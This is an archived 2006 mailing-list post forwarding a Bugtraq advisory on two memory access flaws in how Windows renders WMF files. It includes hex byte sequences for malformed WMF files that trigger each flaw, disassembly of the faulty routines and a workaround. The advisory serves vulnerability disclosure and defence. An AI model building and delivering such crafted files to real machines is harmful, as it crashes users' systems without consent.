Lexa Software: Security-Alerts@yandex-team.ru archive

		Apache-Talk @lexa.ru
		Inet-Admins @info.east.ru
		Filmscanners @halftone.co.uk
		Security-alerts @yandex-team.ru
		nginx-ru @sysoev.ru

СТАТЬИ

ПЕРСОНАЛЬНОЕ

ПРОГРАММЫ

ПИШИТЕ
ПИСЬМА

АРХИВ :: Security-alerts

Security-Alerts mailing list archive (security-alerts@yandex-team.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] FW: [UPDATE]Microsoft Windows GRE WMF Format Multiple Unauthorized Memory Access Vulnerabilities

To: <security-alerts@xxxxxxxxxxxxxx>
Subject: [security-alerts] FW: [UPDATE]Microsoft Windows GRE WMF Format Multiple Unauthorized Memory Access Vulnerabilities
From: "Kazennov, Vladimir" <Vladimir.Kazennov@xxxxxxxxxx>
Date: Tue, 10 Jan 2006 20:20:51 +0300
Content-class: urn:content-classes:message
List-archive: <http://www.lexa.ru/security-alerts/> (Web Archive)
List-id: <security-alerts.yandex-team.ru>
List-subscribe: <mailto:majordomo@yandex-team.ru?body=subscribe%20security-alerts>
List-unsubscribe: <mailto:majordomo@yandex-team.ru?body=unsubscribe%20security-alerts>
Thread-index: AcYVS777P4CSG1OyQtKXnhLANQi8EwAvmuWw
Thread-topic: [UPDATE]Microsoft Windows GRE WMF Format Multiple Unauthorized Memory Access Vulnerabilities

> -----Original Message-----
> From: frankruder@xxxxxxxxxxx [mailto:frankruder@xxxxxxxxxxx] 
> Sent: Monday, January 09, 2006 12:08 PM
> To: bugtraq@xxxxxxxxxxxxxxxxx
> Subject: [UPDATE]Microsoft Windows GRE WMF Format Multiple 
> Unauthorized Memory Access Vulnerabilities
> 
> Microsoft Windows GRE WMF Format Multiple Unauthorized Memory 
> Access Vulnerabilities
> 
> //this bug report is update for <<Microsoft Windows GRE WMF 
> Format Multiple Memory Overrun Vulnerabilities>> by cocoruder 
> 2006.01.07
> 
> by cocoruder
> page:http://ruder.cdut.net
> email:frankruder_at_hotmail.com
> 
> Last Update:2006.01.09
> class:design error
> Remote:yes
> local:yes
> 
> Product Affected:
> Microsoft Windows XP SP2
> Microsoft Windows XP SP1
> Microsoft Windows Server 2003 SP1
> Microsoft Windows Server 2003
> Microsoft Windows ME
> Microsoft Windows 98se
> Microsoft Windows 98
> Microsoft Windows 2000SP4
> 
> Vendor:
> www.microsoft.com
> 
> Overview:
> Microsoft Windows GRE(Graphics Rendering Engine) has been 
> discovered multiple Unauthorized Memory Access 
> vulnerabilities while rendering WMF format file.Users who 
> view the malicious WMF format file will bring a denial of 
> service attack(explorer.exe will be restart).attend that the 
> follow two vuls are independent of MS05-053 or MS06-001.
> 
> Details:
> there is 2 vulnerabilities at least.
> 
> 1.ExtCreateRegion call result in Unauthorized Memory Access 
> vulnerability
> 
> you can exploit the vul via create a WMF file like this:
> 010009000003220000000100844300000000          //WMFHEAD
> 050000000B028B033F21                                  //first 
> WMFRECORD
> 04000000FF0044444444444444444444FFFF33333333333333333333FFFF4
> 1424344               //the vul WMFRECORD
> 030000000000                                          //end WMFRECORD
> 
> the issue code as following:
> .text:7F00FE07 loc_7F00FE07:                           ; CODE 
> XREF: PlayMetaFileRecord+1256j
> .text:7F00FE07                 sub     eax, 3
> .text:7F00FE0A                 jnz     loc_7F022B9A    ; 0xff
> .text:7F00FE10                 movzx   ecx, word ptr 
> [ebx+10h]     ;get total "PointtStruct" number
> .text:7F00FE14                 mov     [ebp-88h], ecx         ;save
> .text:7F00FE1A                 test    ecx, ecx
> .text:7F00FE1C                 jnz     short loc_7F00FE2E     ;jmp 
> .text:7F00FE1E                 xor     eax, eax
> .text:7F00FE20                 push    eax             ; int
> .text:7F00FE21                 push    eax             ; int
> .text:7F00FE22                 push    eax             ; int
> .text:7F00FE23                 push    eax             ; int
> .text:7F00FE24                 call    CreateRectRgn
> .text:7F00FE29                 jmp     loc_7F010494
> .text:7F00FE2E ; 
> &#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#2173
> 8;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21
> 738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#
> 21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;&#21738;
> &#21738;&#21738;&#21738;&#21738;&#21738;&#21738;?
> .text:7F00FE2E
> .text:7F00FE2E loc_7F00FE2E:                           ; CODE 
> XREF: PlayMetaFileRecord+C15j
> .text:7F00FE2E                 xor     edi, edi
> .text:7F00FE30                 mov     [ebp-8Ch], edi
> .text:7F00FE36                 lea     eax, [ebx+1Ch]         
> ;get first "PointtStruct" address
> .text:7F00FE39                 mov     [ebp-90h], eax         ;save
> .text:7F00FE3F                 and     [ebp-94h], edi                 
> .text:7F00FE45                 and     [ebp-98h], edi
> .text:7F00FE4B                 test    ecx, ecx
> .text:7F00FE4D                 jbe     short loc_7F00FE8C             
> .text:7F00FE4F
> .text:7F00FE4F loc_7F00FE4F:                           ; CODE 
> XREF: PlayMetaFileRecord+C83j
> .text:7F00FE4F                 movzx   ecx, word ptr [eax]    
> ;get PointNum,here will trigger memory access error**
> .text:7F00FE52                 mov     edx, ecx               
>               
> .text:7F00FE54                 shr     edx, 1                 
> ;PointNum/2
> .text:7F00FE56                 add     edx, edi               
>       ;sum PointNum/2
> .text:7F00FE58                 cmp     edx, edi
> .text:7F00FE5A                 jb      loc_7F0106D5
> .text:7F00FE60                 mov     edi, edx
> .text:7F00FE62                 mov     [ebp-8Ch], edi
> .text:7F00FE68                 cmp     ecx, 7FFFFFFBh
> .text:7F00FE6E                 jnb     loc_7F0106D5
> .text:7F00FE74                 lea     eax, [eax+ecx*2+8]
> .text:7F00FE78                 inc     dword ptr [ebp-98h]    
> ;counter+1
> .text:7F00FE7E                 mov     ecx, [ebp-98h]
> .text:7F00FE84                 cmp     ecx, [ebp-88h]         
> ;cmp total "PointtStruct" number
> .text:7F00FE8A                 jb      short loc_7F00FE4F     
> ;traverse all "PointtStruct"
> .text:7F00FE8C
> .text:7F00FE8C loc_7F00FE8C:                                  
>       ; CODE XREF: PlayMetaFileRecord+C46j
> .text:7F00FE8C                                                
>       ; PlayMetaFileRecord+14D8j
> .text:7F00FE8C                 cmp     dword ptr [ebp-94h], 0
> .text:7F00FE93                 jnz     loc_7F022BA2
> .text:7F00FE99                 cmp     edi, 0FFFFFFDh
> .text:7F00FE9F                 jnb     loc_7F022BA2
> .text:7F00FEA5                 mov     eax, [ebp-8Ch]
> .text:7F00FEAB                 add     eax, 2
> .text:7F00FEAE                 shl     eax, 4
> .text:7F00FEB1                 mov     [ebp-9Ch], eax
> .text:7F00FEB7                 push    eax             ; uBytes
> .text:7F00FEB8                 push    0               ; uFlags
> .text:7F00FEBA                 call    ds:LocalAlloc          
> ;will allocate memory normally.
> .text:7F00FEC0                 mov     edi, eax
> 
> 
> 2.ExtEscape POSTSCRIPT_INJECTION result in Unauthorized 
> Memory Access vulnerability
> 
> you can exploit the vul via create WMF file like this:
> 010009000003220000000100844300000000  //WMFHEAD
> 050000000B028B033F21                          //first WMFRECORD
> 0400000026001610FFFF44444444444444444444444444444444444444444
> 4444344       //the vul WMFRECORD
> 030000000000                                  //end WMFRECORD
> 
> the issue code as following:
> 
> .text:7F027312 loc_7F027312:                           ; CODE 
> XREF: ExtEscape+11Ej
> .text:7F027312                                         ; 
> ExtEscape+12Aj
> .text:7F027312                 test    byte ptr [ecx+4], 40h
> .text:7F027316                 jnz     loc_7F017CEC
> .text:7F02731C                 mov     ebx, [ebp+arg_8]       
>       ;we can cotrol this:cbSize
> .text:7F02731F                 add     ebx, 1Ah               
>       ;cbSize+0x1a
> .text:7F027322                 and     ebx, 0FFFFFFFCh        
>       ;cbSize+0x1a-4
> .text:7F027325                 mov     eax, large fs:18h
> .text:7F02732B                 mov     eax, [eax+30h]
> .text:7F02732E                 push    ebx
> .text:7F02732F                 push    0
> .text:7F027331                 push    dword ptr [eax+18h]
> .text:7F027334                 call    ds:RtlAllocateHeap     
> ;allocate memory size=cbSize+0x16
> .text:7F02733A                 test    eax, eax
> .text:7F02733C                 jz      short loc_7F027385
> .text:7F02733E                 mov     ecx, [ebp+arg_4]
> .text:7F027341                 mov     [eax+0Ch], ecx
> .text:7F027344                 mov     ecx, [ebp+arg_8]
> .text:7F027347                 mov     [eax+10h], ecx
> .text:7F02734A                 mov     edx, ecx
> .text:7F02734C                 shr     ecx, 2
> .text:7F02734F                 sub     ebx, 8
> .text:7F027352                 mov     [eax+8], ebx
> .text:7F027355                 lea     edi, [eax+14h]
> .text:7F027358                 rep movsd                      
> ;copy,here will trigger a memory error likely**
> .text:7F02735A                 mov     ecx, edx
> .text:7F02735C                 and     ecx, 3
> .text:7F02735F                 rep movsb
> .text:7F027361                 mov     ecx, [ebp-4]
> .text:7F027364                 mov     edi, [ebp+arg_14]
> .text:7F027367                 lea     edx, [ecx+48h]
> .text:7F02736A                 mov     esi, [edx+4]
> .text:7F02736D                 mov     [eax+4], esi
> 
> 
> Solution:
> Microsoft has not develop the patch,please unregister the 
> Windows Picture and Fax Viewer (Shimgvw.dll)(see MS06-001).
> 
> Thanks:
> thanks all my friends.
> 
> -EOF-
>

Prev by Date: [security-alerts] FW: [SA18379] ClamAV Unspecified UPX File Handling Vulnerability
Next by Date: [security-alerts] Fwd: Новости 10 января 2006 г.
Previous by thread: [security-alerts] FW: [SA18379] ClamAV Unspecified UPX File Handling Vulnerability
Next by thread: [security-alerts] Fwd: Новости 10 января 2006 г.
Index(es):
- Date
- Thread